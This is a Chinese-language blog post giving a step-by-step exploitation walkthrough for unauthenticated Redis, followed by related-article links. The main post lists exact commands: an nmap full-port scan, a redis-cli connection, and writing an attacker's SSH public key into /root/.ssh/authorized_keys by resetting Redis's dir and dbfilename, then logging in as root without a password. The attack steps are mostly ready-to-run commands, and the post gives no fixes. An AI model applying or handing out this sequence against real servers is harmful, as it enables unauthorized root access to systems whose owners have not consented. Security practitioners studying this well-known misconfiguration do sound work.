redis未授权访问漏洞利用

缺乏、安全感 2021-12-04 01:25 374阅读 0赞

参考：[https://blog.csdn.net/guxiaoguo/article/details/78913245][https_blog.csdn.net_guxiaoguo_article_details_78913245]

利用条件：linux，对方开启ssh

用到的工具：kail nmap redis

公司测试服务器：10.0.3.45

redis默认端口：6379

主要思路：利用redis未授权访问命令给root账户写入SSH公钥文件，然后通过SSH登录服务器

nmap扫描

使用命令：nmap -sV -p 1-65535 10.0.3.45

\-sV 识别服务，很有用

\-p 1-65535 全端口扫描

发现6379端口开启

若kail上没有redis，可以先利用wget下载下来，并解压，我这里用的是2.8.12

下载命令：wget [http://download.redis.io/releases/redis-2.8.12.tar.gz][http_download.redis.io_releases_redis-2.8.12.tar.gz]

解压命令：tar -xzf redis-2.8.12.tar.gz

到所在目录中安装：make

完成安装后会提醒：

换到此目录中：cd /root/redis-2.8.12/src

连接

命令：./redis-cli -h 10.0.3.45

可以通过info查看一些信息。

接下来写入ssh公钥

原理就是在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里，这样就可以再服务器端的/root/.ssh下生一个授权的key。

首先在自己的kail中生成一个key。

进入/root/.ssh目录：cd /root/.ssh

生成key命令：ssh-keygen -t rsa

查看生成的文件

将公钥导入key.txt文件中（前后用\\n换行，目的是避免和redis里的其他数据混合，造成乱码），再把key.txt文件内容写入目标主机的缓冲里：

命令：(echo -e “\\n\\n”; cat id\_rsa.pub; echo -e “\\n\\n”) > key.txt

此时切换回redis的目录，将key.txt文件内容写入到目标主机的缓冲中

cd /root/redis-2.8.12/src

cat /root/.ssh/key.txt | ./redis-cli -h 10.0.3.45 -x set xxx

连接目标主机的redis，设置redis的备份路径为/root/.ssh和保存文件名authorized\_keys

连接目标主机命令：./redis-cli -h 10.0.3.45

设置备份路径：config set dir /root/.ssh

保存文件名：config set dbfilename authorized\_keys

可以看到写入的公钥

get xxx

然后将数据保存在服务器硬盘中并退出

save

exit

此时用ssh远程连接：

命令：ssh 10.0.3.45

可以看到已经不用密码就可以远程登录了（在没有经过这些操作前，进入ssh是需要输入password的）

可以进入/root/.ssh目录，简单看一下authorized\_keys的文件内容

[https_blog.csdn.net_guxiaoguo_article_details_78913245]: https://blog.csdn.net/guxiaoguo/article/details/78913245
[http_download.redis.io_releases_redis-2.8.12.tar.gz]: http://download.redis.io/releases/redis-2.8.12.tar.gz

发表评论取消回复

表情：

评论列表（有 0 条评论，374人围观）

还没有评论，来说两句吧...

相关阅读

相关【未授权漏洞】PowerJob未授权访问漏洞(CVE-2023-29922)

0x01 漏洞描述 PowerJob是一个开源分布式计算和作业调度框架，它允许开发人员在自己的应用程序中轻松调度任务。PowerJob V`4.3.1`版本存在安全漏洞，

╰半橙微兮°/ 2024年03月16日 16:40/ 0 赞/ 63 阅读

相关利用redis未授权访问漏洞获取主机权限

目录一、漏洞描述二、漏洞影响版本三、漏洞危害四、漏洞利用五、修复建议一、漏洞描述 Redi

浅浅的花香味﹌/ 2023年10月06日 17:42/ 0 赞/ 27 阅读

相关 JBoss漏洞:Jboss未授权访问漏洞

Jboss未授权访问漏洞合集:JBOSS未授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台

た入场券/ 2023年09月23日 14:36/ 0 赞/ 147 阅读

相关 linux rsync 漏洞修复,rsync未授权访问漏洞利用

漏洞描述：rsync是Linux系统下的数据镜像备份工具，使用快速增量备份工具Remote Sync可以远程同步，支持本地复制，或者与其他ssh，rsync主机同步。漏洞利

ゞ浴缸里的玫瑰/ 2023年01月22日 08:56/ 0 赞/ 14 阅读

相关未授权访问漏洞——以redis为例

目录未授权漏洞的定义漏洞类型如何发现 redis redis介绍本地漏洞环境搭建(redi

小咪咪/ 2022年12月01日 01:13/ 0 赞/ 265 阅读

相关 Redis 未授权访问漏洞【原理扫描】修复方法

漏洞类型主机漏洞漏洞名称/检查项 Redis 配置不当可直接导致服务器被控制【原理扫描】漏洞名称/检查项 Redis 未授权访问漏洞【原理扫描】加固建议

本是古典何须时尚/ 2022年05月30日 12:08/ 0 赞/ 1262 阅读

相关 Redis未授权访问的漏洞

【漏洞概述】 Redis 默认情况下，会绑定在 0.0.0.0:6379，导致Redis服务暴露到公网上。如果在没有开启认证并且在任意用户可以访问目标服务器的情况下，从而

缺乏、安全感/ 2022年05月13日 06:40/ 0 赞/ 252 阅读

相关 mongodb未授权访问漏洞

catalogue 1. mongodb安装 2. 未授权访问漏洞 3. 漏洞修复及加固 4. 自动化检测点 1. mongodb安装

向右看齐/ 2022年03月30日 07:58/ 0 赞/ 567 阅读

相关 redis未授权访问漏洞利用

参考：[https://blog.csdn.net/guxiaoguo/article/details/78913245][https_blog.csdn.net_guxiao

缺乏、安全感/ 2021年12月04日 01:25/ 0 赞/ 375 阅读

相关 redis 未授权访问利用两种方式

1、未授权访问漏洞 Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，

不念不忘少年蓝@/ 2021年07月28日 17:32/ 0 赞/ 650 阅读